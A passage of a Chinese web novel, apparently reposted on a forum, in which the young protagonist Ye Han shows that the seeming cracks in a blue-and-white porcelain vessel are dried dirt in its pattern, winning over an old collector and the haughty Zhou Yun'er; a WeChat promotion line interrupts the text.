  “呵呵,小妞,是谁给你说这青花瓷破裂了?”叶寒同样是冷笑一声,而后他在那女子和老人目光的注视下用指甲在那一道道裂纹上划过,一层层污垢被他用指甲挑了出来,这些污垢全部都是泥土,这些泥土黏在青花瓷的那些纹路上,或许是年代太过久远的缘故,泥土开裂,让人一眼看去就好像是这件青花瓷即将破碎一样,殊不知,这些类似裂纹一样的东西本身就是青花瓷上面的一副图案,只是被那一层泥土给覆盖了,两者合一,很难让人分得清楚。
  女子和老人见到这一幕后,他们的目光顿时一缩,泥土黏在青花瓷的纹路中,他们居然丝毫没有发现这一点,本身是泥土开裂,竟然让他们以为是青花瓷本身裂开了。
  “呵呵,小兄弟好眼力!”老人在微微震惊之后,他走近叶寒笑道;“佩服,还是你们年轻人眼力好,小兄弟,这青花瓷能不能让我在把把眼?”
  叶寒对这老人印象不错也就没有推辞将青花瓷递给了他,老人接手之后反复看了起来,还从口袋里掏出了一个放大镜仔细的观看着,那女子看叶寒的目光也稍微有了一点变化,眼前这少年虽然不知道他鉴赏古玩的功力有几分,但这份眼力已经超过她了,当然,这也并非说她服了叶寒,叶寒手中的青花瓷究竟是不是真品还不一定了。篇幅有限 关注徽信,公众号[玉箫小说] 回复数字41, 继续阅读高潮不断! “喂,你叫什幺名字?以前在古玩一条街怎幺没有见过你?”在老人观看青花瓷的时候,周允儿看着叶寒问道,语气虽然还是有点高傲,但比刚才已经好了很多,叶寒看了她一眼;“我叫叶寒,这是第一次来古玩一条街,你当然没有见过我。”
  听见叶寒这话,周允儿撇了撇嘴,明显有些不相信,第一次来古玩一条街就有如此强劲的眼力?要知道她也是多次在古玩市场淘金之后才逐渐学会一些东西的。

[ 此贴被半俗不雅在2018-11-03 18:23重新编辑 ]

  • 1